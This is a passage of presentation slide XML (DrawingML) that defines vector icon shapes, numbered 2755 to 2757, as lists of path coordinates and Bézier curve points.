                  <a:pt x="6480" y="17453"/>
                  <a:pt x="6480" y="17182"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6480" y="16910"/>
                  <a:pt x="6238" y="16691"/>
                  <a:pt x="5940" y="166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5" name="Shape 2755"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9997084" y="3949265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4909"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19200" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19200" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19200" y="2674"/>
                  <a:pt x="18932" y="2455"/>
                  <a:pt x="18600" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18268" y="2455"/>
                  <a:pt x="18000" y="2674"/>
                  <a:pt x="18000" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18000" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="2674"/>
                  <a:pt x="16532" y="2455"/>
                  <a:pt x="16200" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="2455"/>
                  <a:pt x="15600" y="2674"/>
                  <a:pt x="15600" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15600" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="2183"/>
                  <a:pt x="14132" y="1964"/>
                  <a:pt x="13800" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13468" y="1964"/>
                  <a:pt x="13200" y="2183"/>
                  <a:pt x="13200" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13200" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="2674"/>
                  <a:pt x="11732" y="2455"/>
                  <a:pt x="11400" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11068" y="2455"/>
                  <a:pt x="10800" y="2674"/>
                  <a:pt x="10800" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9600" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9600" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9600" y="2183"/>
                  <a:pt x="9332" y="1964"/>
                  <a:pt x="9000" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8668" y="1964"/>
                  <a:pt x="8400" y="2183"/>
                  <a:pt x="8400" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8400" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="2945"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="2674"/>
                  <a:pt x="5732" y="2455"/>
                  <a:pt x="5400" y="2455"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="2455"/>
                  <a:pt x="4800" y="2674"/>
                  <a:pt x="4800" y="2945"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="2455"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="2183"/>
                  <a:pt x="3332" y="1964"/>
                  <a:pt x="3000" y="1964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2668" y="1964"/>
                  <a:pt x="2400" y="2183"/>
                  <a:pt x="2400" y="2455"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="4909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20400" y="982"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="982"/>
                  <a:pt x="20400" y="4909"/>
                  <a:pt x="20400" y="4909"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20400" y="10309"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19200" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19200" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19200" y="7583"/>
                  <a:pt x="18932" y="7364"/>
                  <a:pt x="18600" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18268" y="7364"/>
                  <a:pt x="18000" y="7583"/>
                  <a:pt x="18000" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18000" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="7092"/>
                  <a:pt x="16532" y="6873"/>
                  <a:pt x="16200" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="6873"/>
                  <a:pt x="15600" y="7092"/>
                  <a:pt x="15600" y="7364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15600" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="7583"/>
                  <a:pt x="14132" y="7364"/>
                  <a:pt x="13800" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13468" y="7364"/>
                  <a:pt x="13200" y="7583"/>
                  <a:pt x="13200" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13200" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12000" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12000" y="7092"/>
                  <a:pt x="11732" y="6873"/>
                  <a:pt x="11400" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11068" y="6873"/>
                  <a:pt x="10800" y="7092"/>
                  <a:pt x="10800" y="7364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10800" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8400" y="7583"/>
                  <a:pt x="8132" y="7364"/>
                  <a:pt x="7800" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7468" y="7364"/>
                  <a:pt x="7200" y="7583"/>
                  <a:pt x="7200" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7200" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="7855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="7583"/>
                  <a:pt x="5732" y="7364"/>
                  <a:pt x="5400" y="7364"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="7364"/>
                  <a:pt x="4800" y="7583"/>
                  <a:pt x="4800" y="7855"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="7364"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="7092"/>
                  <a:pt x="3332" y="6873"/>
                  <a:pt x="3000" y="6873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2668" y="6873"/>
                  <a:pt x="2400" y="7092"/>
                  <a:pt x="2400" y="7364"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="10309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="10309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0309"/>
                  <a:pt x="20400" y="10309"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20400" y="15709"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19200" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19200" y="13255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19200" y="12983"/>
                  <a:pt x="18932" y="12764"/>
                  <a:pt x="18600" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18268" y="12764"/>
                  <a:pt x="18000" y="12983"/>
                  <a:pt x="18000" y="13255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18000" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="13255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="12983"/>
                  <a:pt x="16532" y="12764"/>
                  <a:pt x="16200" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="12764"/>
                  <a:pt x="15600" y="12983"/>
                  <a:pt x="15600" y="13255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15600" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13200" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13200" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13200" y="13474"/>
                  <a:pt x="12932" y="13255"/>
                  <a:pt x="12600" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12268" y="13255"/>
                  <a:pt x="12000" y="13474"/>
                  <a:pt x="12000" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12000" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="13474"/>
                  <a:pt x="10532" y="13255"/>
                  <a:pt x="10200" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9868" y="13255"/>
                  <a:pt x="9600" y="13474"/>
                  <a:pt x="9600" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9600" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="13255"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8400" y="12983"/>
                  <a:pt x="8132" y="12764"/>
                  <a:pt x="7800" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7468" y="12764"/>
                  <a:pt x="7200" y="12983"/>
                  <a:pt x="7200" y="13255"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7200" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="13745"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="13474"/>
                  <a:pt x="5732" y="13255"/>
                  <a:pt x="5400" y="13255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="13255"/>
                  <a:pt x="4800" y="13474"/>
                  <a:pt x="4800" y="13745"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="15709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="11291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20400" y="11291"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="11291"/>
                  <a:pt x="20400" y="15709"/>
                  <a:pt x="20400" y="15709"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20400" y="20618"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19200" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19200" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19200" y="18383"/>
                  <a:pt x="18932" y="18164"/>
                  <a:pt x="18600" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18268" y="18164"/>
                  <a:pt x="18000" y="18383"/>
                  <a:pt x="18000" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18000" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16800" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16800" y="18383"/>
                  <a:pt x="16532" y="18164"/>
                  <a:pt x="16200" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15868" y="18164"/>
                  <a:pt x="15600" y="18383"/>
                  <a:pt x="15600" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15600" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14400" y="18164"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14400" y="17892"/>
                  <a:pt x="14132" y="17673"/>
                  <a:pt x="13800" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13468" y="17673"/>
                  <a:pt x="13200" y="17892"/>
                  <a:pt x="13200" y="18164"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13200" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10800" y="18164"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="17892"/>
                  <a:pt x="10532" y="17673"/>
                  <a:pt x="10200" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9868" y="17673"/>
                  <a:pt x="9600" y="17892"/>
                  <a:pt x="9600" y="18164"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9600" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8400" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8400" y="18383"/>
                  <a:pt x="8132" y="18164"/>
                  <a:pt x="7800" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7468" y="18164"/>
                  <a:pt x="7200" y="18383"/>
                  <a:pt x="7200" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7200" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6000" y="18164"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="17892"/>
                  <a:pt x="5732" y="17673"/>
                  <a:pt x="5400" y="17673"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5068" y="17673"/>
                  <a:pt x="4800" y="17892"/>
                  <a:pt x="4800" y="18164"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4800" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3600" y="18655"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3600" y="18383"/>
                  <a:pt x="3332" y="18164"/>
                  <a:pt x="3000" y="18164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2668" y="18164"/>
                  <a:pt x="2400" y="18383"/>
                  <a:pt x="2400" y="18655"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2400" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="20618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1200" y="16691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20400" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20400" y="16691"/>
                  <a:pt x="20400" y="20618"/>
                  <a:pt x="20400" y="20618"/>
                </a:cubicBezTo>
                <a:close/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40"/>
                  <a:pt x="0" y="982"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="20618"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21160"/>
                  <a:pt x="537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062" y="0"/>
                  <a:pt x="204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6" name="Shape 2756"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10504952" y="4025445"/>
            <a:ext cx="279328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19440"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="17951" y="19440"/>
                  <a:pt x="17182" y="17747"/>
                  <a:pt x="17182" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17182" y="14601"/>
                  <a:pt x="17381" y="13647"/>
                  <a:pt x="17700" y="12960"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3900" y="12960"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4219" y="13647"/>
                  <a:pt x="4418" y="14601"/>
                  <a:pt x="4418" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="17747"/>
                  <a:pt x="3649" y="19440"/>
                  <a:pt x="2700" y="19440"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1751" y="19440"/>
                  <a:pt x="982" y="17747"/>
                  <a:pt x="982" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="13757"/>
                  <a:pt x="1623" y="12199"/>
                  <a:pt x="2455" y="11935"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2455" y="11880"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2726" y="11880"/>
                  <a:pt x="2945" y="11397"/>
                  <a:pt x="2945" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="10203"/>
                  <a:pt x="2726" y="9720"/>
                  <a:pt x="2455" y="9720"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2455" y="9665"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1623" y="9401"/>
                  <a:pt x="982" y="7843"/>
                  <a:pt x="982" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="3852"/>
                  <a:pt x="1751" y="2160"/>
                  <a:pt x="2700" y="2160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3649" y="2160"/>
                  <a:pt x="4418" y="3852"/>
                  <a:pt x="4418" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4418" y="6999"/>
                  <a:pt x="4219" y="7954"/>
                  <a:pt x="3900" y="8640"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17700" y="8640"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17381" y="7954"/>
                  <a:pt x="17182" y="6999"/>
                  <a:pt x="17182" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17182" y="3852"/>
                  <a:pt x="17951" y="2160"/>
                  <a:pt x="18900" y="2160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19849" y="2160"/>
                  <a:pt x="20618" y="3852"/>
                  <a:pt x="20618" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="7843"/>
                  <a:pt x="19977" y="9401"/>
                  <a:pt x="19145" y="9665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19145" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18874" y="9720"/>
                  <a:pt x="18655" y="10203"/>
                  <a:pt x="18655" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="11397"/>
                  <a:pt x="18874" y="11880"/>
                  <a:pt x="19145" y="11880"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19145" y="11935"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19977" y="12199"/>
                  <a:pt x="20618" y="13757"/>
                  <a:pt x="20618" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="17747"/>
                  <a:pt x="19849" y="19440"/>
                  <a:pt x="18900" y="19440"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20449" y="10800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21145" y="9725"/>
                  <a:pt x="21600" y="7950"/>
                  <a:pt x="21600" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="2660"/>
                  <a:pt x="20391" y="0"/>
                  <a:pt x="18900" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17409" y="0"/>
                  <a:pt x="16200" y="2660"/>
                  <a:pt x="16200" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="6124"/>
                  <a:pt x="16208" y="6301"/>
                  <a:pt x="16215" y="6480"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5385" y="6480"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5392" y="6301"/>
                  <a:pt x="5400" y="6124"/>
                  <a:pt x="5400" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="2660"/>
                  <a:pt x="4191" y="0"/>
                  <a:pt x="2700" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1209" y="0"/>
                  <a:pt x="0" y="2660"/>
                  <a:pt x="0" y="5940"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7950"/>
                  <a:pt x="455" y="9725"/>
                  <a:pt x="1151" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="455" y="11875"/>
                  <a:pt x="0" y="13649"/>
                  <a:pt x="0" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="18940"/>
                  <a:pt x="1209" y="21600"/>
                  <a:pt x="2700" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4191" y="21600"/>
                  <a:pt x="5400" y="18940"/>
                  <a:pt x="5400" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="15476"/>
                  <a:pt x="5392" y="15298"/>
                  <a:pt x="5385" y="15120"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16215" y="15120"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16208" y="15298"/>
                  <a:pt x="16200" y="15476"/>
                  <a:pt x="16200" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="18940"/>
                  <a:pt x="17409" y="21600"/>
                  <a:pt x="18900" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20391" y="21600"/>
                  <a:pt x="21600" y="18940"/>
                  <a:pt x="21600" y="15660"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="13649"/>
                  <a:pt x="21145" y="11875"/>
                  <a:pt x="20449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7" name="Shape 2757"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11038212" y="3949265"/>
            <a:ext cx="279399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4" h="21085" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="6690" y="19632"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6035" y="20288"/>
                  <a:pt x="4973" y="20288"/>
                  <a:pt x="4318" y="19632"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3731" y="19043"/>
                  <a:pt x="3675" y="18127"/>
                  <a:pt x="4141" y="17471"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4127" y="17458"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4237" y="17311"/>
                  <a:pt x="4231" y="17106"/>
                  <a:pt x="4096" y="16973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3963" y="16842"/>
                  <a:pt x="3758" y="16835"/>
                  <a:pt x="3610" y="16939"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3601" y="16931"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2946" y="17395"/>
                  <a:pt x="2036" y="17338"/>
                  <a:pt x="1449" y="16752"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="794" y="16097"/>
                  <a:pt x="794" y="15035"/>
                  <a:pt x="1449" y="14381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2104" y="13726"/>
                  <a:pt x="3166" y="13726"/>
                  <a:pt x="3821" y="14381"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4110" y="14670"/>
                  <a:pt x="4264" y="15040"/>
                  <a:pt x="4297" y="15418"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9862" y="9852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15417" y="4298"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15038" y="4264"/>
                  <a:pt x="14669" y="4111"/>
                  <a:pt x="14380" y="3821"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13725" y="3166"/>
                  <a:pt x="13725" y="2105"/>
                  <a:pt x="14380" y="1450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15034" y="795"/>
                  <a:pt x="16096" y="795"/>
                  <a:pt x="16751" y="1450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17332" y="2031"/>
                  <a:pt x="17394" y="2932"/>
                  <a:pt x="16943" y="3585"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16949" y="3592"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16829" y="3738"/>
                  <a:pt x="16832" y="3953"/>
                  <a:pt x="16971" y="4089"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17109" y="4225"/>
                  <a:pt x="17323" y="4230"/>
                  <a:pt x="17473" y="4114"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17487" y="4129"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18142" y="3675"/>
                  <a:pt x="19047" y="3737"/>
                  <a:pt x="19631" y="4319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20287" y="4974"/>
                  <a:pt x="20287" y="6036"/>
                  <a:pt x="19631" y="6691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18974" y="7346"/>
                  <a:pt x="17909" y="7346"/>
                  <a:pt x="17253" y="6691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16962" y="6400"/>
                  <a:pt x="16807" y="6029"/>
                  <a:pt x="16775" y="5650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5650" y="16775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6029" y="16808"/>
                  <a:pt x="6400" y="16963"/>
                  <a:pt x="6690" y="17254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7344" y="17910"/>
                  <a:pt x="7344" y="18975"/>
                  <a:pt x="6690" y="19632"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7277" y="16503"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16501" y="7278"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16528" y="7307"/>
                  <a:pt x="16545" y="7340"/>
                  <a:pt x="16573" y="7368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17605" y="8397"/>
                  <a:pt x="19278" y="8397"/>
